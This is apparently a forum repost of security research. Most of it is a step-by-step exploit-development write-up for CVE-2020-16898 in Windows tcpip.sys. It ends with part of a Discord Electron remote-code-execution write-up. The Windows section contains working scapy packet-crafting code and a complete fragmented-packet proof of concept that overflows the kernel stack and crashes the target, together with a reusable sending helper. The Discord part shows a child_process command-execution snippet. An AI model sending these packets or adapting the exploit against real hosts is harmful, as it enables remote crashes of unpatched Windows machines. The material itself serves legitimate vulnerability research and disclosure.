"While we ignore all Options that aren't RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we've already consumed)."

OK, what have we learned from it? Quite a lot:

  • We need to send an RDNSS packet.
  • The problem is an even number in the Length field.
  • The function responsible for parsing the packet will reference the last 8 bytes of the RDNSS payload as the next header.

That's more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

The Recursive DNS Server Option (RDNSS) is one of the sub-options of the Router Advertisement (RA) message. RA messages can be sent via ICMPv6.
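Before looking at the RFC, here is a rough sketch of the option walk described in the quote above (my own simplified model, not the actual tcpip.sys code). It shows how an even RDNSS Length makes the walker land 8 bytes short, so the tail of the RDNSS payload is treated as the start of a new option:

    # Simplified model of the ND option walk described above (not the real parser).
    # Each option is: [type (1 byte)][length (1 byte, in units of 8 bytes)][data ...]
    def walk_options(buf: bytes):
        off = 0
        while off + 2 <= len(buf):
            opt_type, opt_len = buf[off], buf[off + 1]
            if opt_len == 0:
                break  # malformed
            print(f"offset {off:3}: type={opt_type} len={opt_len * 8} bytes")
            off += opt_len * 8

    rdnss_body = b"\x00" * 6 + b"A" * 48      # reserved + lifetime (6 bytes), then three 16-byte addresses
    correct  = bytes([25, 7]) + rdnss_body    # Length 7 -> 56 bytes, consumes the whole option
    smuggled = bytes([25, 6]) + rdnss_body    # Length 6 -> 48 bytes, stops 8 bytes early

    walk_options(correct)
    print("---")
    walk_options(smuggled)   # the final 8 bytes of the RDNSS data now parse as a new "option"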
Let's look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option

The RDNSS option contains one or more IPv6 addresses of recursive DNS servers. All of the addresses share the same lifetime value. If it is desirable to have different lifetime values, multiple RDNSS options can be used. Figure 1 shows the format of the RDNSS option.

     0                   1                   2                   3
     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |     Type      |     Length    |           Reserved            |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                           Lifetime                            |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                                                               |
    :            Addresses of IPv6 Recursive DNS Servers            :
    |                                                               |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

    Length    8-bit unsigned integer. The length of the option (including the
              Type and Length fields) is in units of 8 octets. The minimum
              value is 3 if one IPv6 address is contained in the option.
              Every additional RDNSS address increases the length by 2. The
              Length field is used by the receiver to determine the number of
              IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.

OK, let's create an RDNSS packet. How? I'm using scapy, since it's the easiest and fastest way to craft whatever packets we want. It is very simple:

    v6_dst = <destination address>
    v6_src = <source address>

    c = ICMPv6NDOptRDNSS()
    c.len = 7
    c.dns = [
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

    pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
    send(pkt)

When we set up a kernel debugger and look through the public symbols of the tcpip.sys driver, we find some interesting function names:

    tcpip!Ipv6pHandleRouterAdvertisement
    tcpip!Ipv6pUpdateRDNSS

Let's try to set breakpoints there and see if our packet arrives:

    0: kd> bp tcpip!Ipv6pUpdateRDNSS
    0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
    0: kd> g
    Breakpoint 0 hit
    tcpip!Ipv6pHandleRouterAdvertisement:
    fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
    0: kd> kpn
     # Child-SP          RetAddr           Call Site
    00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
    01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
    02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
    03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
    04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
    05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
    06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
    07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
    08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
    09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
    0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
    0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
    0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
    0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
    0: kd> g
    ...

Hm... OK. We never hit Ipv6pUpdateRDNSS, but we did hit Ipv6pHandleRouterAdvertisement. This means that our packet is fine. So why did we not end up in Ipv6pUpdateRDNSS?
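Before hunting further, it's worth ruling out a trivial mistake: does len = 7 actually match the RFC rule quoted above for three addresses? A throwaway check (scapy would normally compute len itself):

    # RDNSS Length is in 8-byte units: an 8-byte fixed part (Type/Length/Reserved/Lifetime)
    # plus 16 bytes per DNS address, i.e. 1 + 2 * number_of_addresses -- always odd.
    def rdnss_expected_len(num_addresses: int) -> int:
        return 1 + 2 * num_addresses

    for n in (1, 2, 3):
        print(n, "address(es) -> len =", rdnss_expected_len(n))   # 3, 5, 7

So the length is fine; the real reason is elsewhere.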
Problem 1 – IPv6 link-local address

We are failing validation of the address here:

    fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
    fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
    fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
    fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
    fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
    fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
    fffff804`483ba4ca 33c0            xor     eax,eax
    fffff804`483ba4cc 498bca          mov     rcx,r10
    fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
    fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
    fffff804`483ba4dd 4484d2          test    dl,r10b
    fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
    fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
    fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

    0: kd> dq @r10
    ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
    ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
    ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
    ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
    ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
    ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
    ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
    ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

    ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

match the IPv6 address which I used as the source address:

    v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with the byte 0xFE. By looking here we can learn that:

    fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link
    (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check happens when we fail the previous one:

    fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
    fffff804`484727a0 84c0            test    al,al
    fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
    fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
    fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It checks whether we are coming from LOOPBACK, and next we are validated again for being link-local.
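The same check is easy to reproduce from Python when building packets, so you don't waste time on source addresses the parser will reject (a small helper using the standard ipaddress module; the second address is the link-local source used later in the PoC):

    # Router Advertisements are only accepted from link-local (fe80::/10) sources,
    # so verify the spoofed source address before sending anything.
    import ipaddress

    for src in ("fd12:db80:b052:0:5d7b:5d64:7c08:f5e5",   # the ULA source that failed above
                "fe80::24f5:a2ff:fe30:8890"):             # a link-local source
        addr = ipaddress.IPv6Address(src)
        print(src, "->", "link-local, accepted" if addr.is_link_local
                         else "not link-local, rejected")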
I modified the packet to use a link-local address and...

    Breakpoint 1 hit
    tcpip!Ipv6pUpdateRDNSS:
    fffff804`4852a534 4055            push    rbp
    0: kd> kpn
     # Child-SP          RetAddr           Call Site
    00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
    01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
    02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
    03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
    04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
    05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
    06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
    07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
    08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
    09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
    0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
    0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
    0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
    0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
    0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let's move on to triggering the bug.

Triggering the bug

What we know from the detection logic write-up: "we check to see if the Length (second byte in the Option) is an even number". Let's test it:

    v6_dst = <destination address>
    v6_src = <source address>

    c = ICMPv6NDOptRDNSS()
    c.len = 6
    c.dns = [
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

    pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
    send(pkt)

and we end up executing this code:

    fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
    fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
    fffff804`4852a5bf 418bd7          mov     edx,r15d
    fffff804`4852a5c2 498bce          mov     rcx,r14
    fffff804`4852a5c5 488bd8          mov     rbx,rax
    fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
    fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
    fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
    fffff804`4852a5d4 2bc6            sub     eax,esi
    fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
    fffff804`4852a5da 99              cdq
    fffff804`4852a5db f7f9            idiv    eax,ecx
    fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
    fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
    fffff804`4852a5e3 8bf0            mov     esi,eax
    fffff804`4852a5e5 413bd7          cmp     edx,r15d
    fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and divides the result by 2. This follows the documented logic and can be summarized as:

    tmp = (Length - 1) / 2

This logic generates the same result for the odd and the even number:

    (7 - 1) / 2 => 3
    (6 - 1) / 2 => 3

There is nothing wrong with that by itself. However, this also "defines" how long the packet is. Since IPv6 addresses are 16 bytes long, by providing an even number, the last 8 bytes of the payload will be used as the beginning of the next header. We can see that in Wireshark as well.

That's pretty interesting. However, what do we do with it? What next header should we fake? Why does this matter at all? Well... it took me some time to figure this out.
To be honest, I ended up writing a simple fuzzer to find out.

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don't really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml). What we do know is that ICMPv6 messages have the following general format:

     0                   1                   2                   3
     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |     Type      |     Code      |           Checksum            |
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    |                                                               |
    +                         Message Body                          +
    |                                                               |

The first byte encodes the "type" of the packet. As a test, I generated the next header to be exactly the same as the "buggy" RDNSS one. I kept hitting the breakpoint for tcpip!Ipv6pUpdateRDNSS, but tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I fired up IDA Pro and started to analyze what is going on and what logic is being executed. After some reverse engineering I realized that there are 2 loops in the code:

  • The first loop goes through all the headers and does some basic validation (size of length, etc.).
  • The second loop doesn't do any more validation but parses the packet.

As long as there are more 'optional headers' in the buffer, we stay in the loop. That's a very good primitive! Anyway, I still didn't know which headers should be used, so to find out I brute-forced all the 'optional header' types in the triggered bug and found that the second loop only cares about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

I analyzed the Type 24 logic since it was much "smaller / shorter" than Type 3.

Stack overflow

OK. Let's try to generate the malicious RDNSS packet, "faking" Route Information as the next one:

    v6_dst = <destination address>
    v6_src = <source address>

    c = ICMPv6NDOptRDNSS()
    c.len = 6
    c.dns = [
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
        "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

    pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
    send(pkt)

This never hits the tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the packet

After debugging, I realized that we are failing the following check:

    fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
    fffff804`483ba76a 413bc7          cmp     eax,r15d
    fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the packet and r15 keeps track of how much data was consumed. In this specific case we have:

    rax = 0x48
    r15 = 0x40

This is exactly an 8-byte difference, because we used an even number. To bypass it, I placed another header just after the last one. However, I was still hitting the same problem. It took me some time to figure out how to play with the packet layout to bypass it, but I finally managed to do so.

Problem 4 – size again!

Finally, I found the correct packet layout and I could end up in the code responsible for handling the Route Information header. However, I did not. Here is why. After returning from the RDNSS handler I ended up here:

    fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
    fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
    fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
    ...
fffff804`483bad15 4c8b155c841e00 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0 fffff804`483bad1c e8af33e5ff call fffff804`4820e0d0 ... fffff804`483bad15 4c8b155c841e00 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] fffff804`483bad1c e8af33e5ff call fffff804`4820e0d0 fffff804`483bad21 0fb64801 movzx ecx,byte ptr [rax+1] fffff804`483bad25 66c1e103 shl cx,3 fffff804`483bad29 66894c2462 mov word ptr [rsp+62h],cx fffff804`483bad2e 6685c9 test cx,cx fffff804`483bad31 0f8485060000 je tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc) fffff804`483bad37 0fb7c9 movzx ecx,cx fffff804`483bad3a 413b4e18 cmp ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8 fffff804`483bad3e 0f8778060000 ja tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc) ecx keeps the information about the “Length” of the “fake header”. However, [r14+18h] points to the size of the data left in the package. I set Length to the max (0xFF) which is multiplied by 8 (2040 == 0x7f8). However, there is only “0xb8” bytes left. So, I’ve failed another size validation! To be able to fix it, I’ve decreased the size of the “fake header” and at the same time attached more data to the package. That worked! Problem 5 – NdisGetDataBuffer() and fragmentation I’ve finally found all the puzzles to be able to trigger the bug. I thought so… I ended up executing the following code responsible for handling Route Information message: fffff804`48472cd9 33c0 xor eax,eax fffff804`48472cdb 44897c2420 mov dword ptr [rsp+20h],r15d fffff804`48472ce0 440fb77c2462 movzx r15d,word ptr [rsp+62h] fffff804`48472ce6 4c8d85b8010000 lea r8,[rbp+1B8h] fffff804`48472ced 418bd7 mov edx,r15d fffff804`48472cf0 488985b8010000 mov qword ptr [rbp+1B8h],rax fffff804`48472cf7 448bcf mov r9d,edi fffff804`48472cfa 488985c0010000 mov qword ptr [rbp+1C0h],rax fffff804`48472d01 498bce mov rcx,r14 fffff804`48472d04 488985c8010000 mov qword ptr [rbp+1C8h],rax fffff804`48472d0b 48898580010000 mov qword ptr [rbp+180h],rax fffff804`48472d12 48898588010000 mov qword ptr [rbp+188h],rax fffff804`48472d19 4c8b1558041300 mov r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0 It tries to get the “Length” bytes from the packet to read the entire header. However, Length is fake and not validated. In my test case it has value “0x100”. Destination address is pointing to the stack which represents Route Information header. It is a very small buffer. 
So, we should have classic stack overflow, but inside of the NdisGetDataBuffer function I ended-up executing this: fffff804`4820e10c 8b7910 mov edi,dword ptr [rcx+10h] fffff804`4820e10f 8b4328 mov eax,dword ptr [rbx+28h] fffff804`4820e112 8bf2 mov esi,edx fffff804`4820e114 488d0c3e lea rcx,[rsi+rdi] fffff804`4820e118 483bc8 cmp rcx,rax fffff804`4820e11b 773e ja fffff804`4820e15b fffff804`4820e11d f6430a05 test byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c fffff804`4820e121 0f84813f0400 je fffff804`482520a8 fffff804`4820e127 488b4318 mov rax,qword ptr [rbx+18h] fffff804`4820e12b 4885c0 test rax,rax fffff804`4820e12e 742b je fffff804`4820e15b fffff804`4820e130 8b4c2470 mov ecx,dword ptr [rsp+70h] fffff804`4820e134 8d55ff lea edx,[rbp-1] fffff804`4820e137 4803c7 add rax,rdi fffff804`4820e13a 4823d0 and rdx,rax fffff804`4820e13d 483bd1 cmp rdx,rcx fffff804`4820e140 7519 jne fffff804`4820e15b fffff804`4820e142 488b5c2450 mov rbx,qword ptr [rsp+50h] fffff804`4820e147 488b6c2458 mov rbp,qword ptr [rsp+58h] fffff804`4820e14c 488b742460 mov rsi,qword ptr [rsp+60h] fffff804`4820e151 4883c430 add rsp,30h fffff804`4820e155 415f pop r15 fffff804`4820e157 415e pop r14 fffff804`4820e159 5f pop rdi fffff804`4820e15a c3 ret fffff804`4820e15b 4d85f6 test r14,r14 In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic: “If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows: If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter. If the Storage parameter is NULL, the return value is NULL.” Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes Looking at this link: http://newsoft-tech.blogspot.com/2010/02/ we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and…. KDTARGET: Refreshing KD connection *** Fatal System Error: 0x00000139 (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. 
nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc int 3

0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go!

Proof-of-Concept

Code can be found here: http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [ "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
          "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

Sursa: http://blog.pi3.com.pl/?p=780
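As a side note on the PoC above, the fragmentation step can be pulled out into a small helper so that the payload, the addresses and the fragment size are easy to vary while experimenting. This is a hypothetical convenience wrapper around the same scapy calls the PoC already uses, not part of the original exploit.

from scapy.all import IPv6, IPv6ExtHdrFragment, fragment6, send

def send_fragmented(payload, dst, src, frag_size=200):
    """Fragment 'payload' (e.g. the 'pkt' built in the PoC) and send it.

    Keeping frag_size small forces the Router Advertisement to arrive
    non-contiguously, which is what makes NdisGetDataBuffer copy into the
    caller's Storage buffer instead of returning a pointer into NDIS memory.
    """
    full = IPv6(dst=dst, src=src, hlim=255) / IPv6ExtHdrFragment() / payload
    for frag in fragment6(full, frag_size):
        send(frag)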
20. CVE-2020-16898

PoC BSOD for CVE-2020-16898 (badneighbor)
Tested against Windows 10 version 2004

Sursa: https://github.com/0xeb-bp/cve-2020-16898
21. MKSB(en)
Masato Kinugawa's Security Blog / @kinugawamasato
Saturday, October 17, 2020

Discord Desktop app RCE

A few months ago, I discovered a remote code execution issue in the Discord desktop application and reported it via their Bug Bounty Program. The RCE I found was an interesting one because it is achieved by combining multiple bugs. In this article, I'd like to share the details.

Why I chose Discord for the target

I felt like looking for vulnerabilities in an Electron app, so I was looking for a bug bounty program that pays a bounty for an Electron app, and I found Discord. Also, I am a Discord user and simply wanted to check whether the app I'm using is secure, so I decided to investigate.

Bugs I found

Basically, I found the following three bugs and achieved RCE by combining them:

1. Missing contextIsolation
2. XSS in iframe embeds
3. Navigation restriction bypass (CVE-2020-15174)

I'll explain these bugs one by one.

Missing contextIsolation

When I test an Electron app, I always check the options of the BrowserWindow API first, which is used to create a browser window. By checking them, I think about how RCE could be achieved if arbitrary JavaScript execution on the renderer were possible.

Discord's Electron app is not an open-source project, but its JavaScript code is stored locally in the asar format and I was able to read it just by extracting it. In the main window, the following options are used:

const mainWindowOptions = {
  title: 'Discord',
  backgroundColor: getBackgroundColor(),
  width: DEFAULT_WIDTH,
  height: DEFAULT_HEIGHT,
  minWidth: MIN_WIDTH,
  minHeight: MIN_HEIGHT,
  transparent: false,
  frame: false,
  resizable: true,
  show: isVisible,
  webPreferences: {
    blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
    nodeIntegration: false,
    preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
    nativeWindowOpen: true,
    enableRemoteModule: false,
    spellcheck: true
  }
};

The important options to check here are nodeIntegration and contextIsolation. From the above code, I found that in Discord's main window the nodeIntegration option is set to false and the contextIsolation option is set to false (the default in the version used).

If nodeIntegration is set to true, a web page's JavaScript can use Node.js features simply by calling require(). For example, this is how to execute the calc application on Windows:

<script>
  require('child_process').exec('calc');
</script>

Here, nodeIntegration was set to false, so I couldn't use Node.js features by calling require() directly. However, there was still a possible path to Node.js features: contextIsolation, the other important option, was also set to false. This option should not be set to false if you want to eliminate the possibility of RCE in your app.

If contextIsolation is disabled, a web page's JavaScript can affect the execution of Electron's internal JavaScript code on the renderer and of preload scripts (in the following, this JavaScript will be referred to as "the JavaScript code outside web pages"). For example, if you override Array.prototype.join, one of the JavaScript built-in methods, with another function from a web page's JavaScript, the JavaScript code outside web pages will also use the overridden function when join is called.
This behavior is dangerous, because Electron allows the JavaScript code outside web pages to use Node.js features regardless of the nodeIntegration option, and by interfering with that code from a function overridden in the web page, it could be possible to achieve RCE even if nodeIntegration is set to false.

By the way, such a trick was not previously known. It was first discovered in 2016 during a pentest by Cure53 that I took part in. After that, we reported it to the Electron team and contextIsolation was introduced. Recently, that pentest report was published. If you are interested, you can read it at the following link:

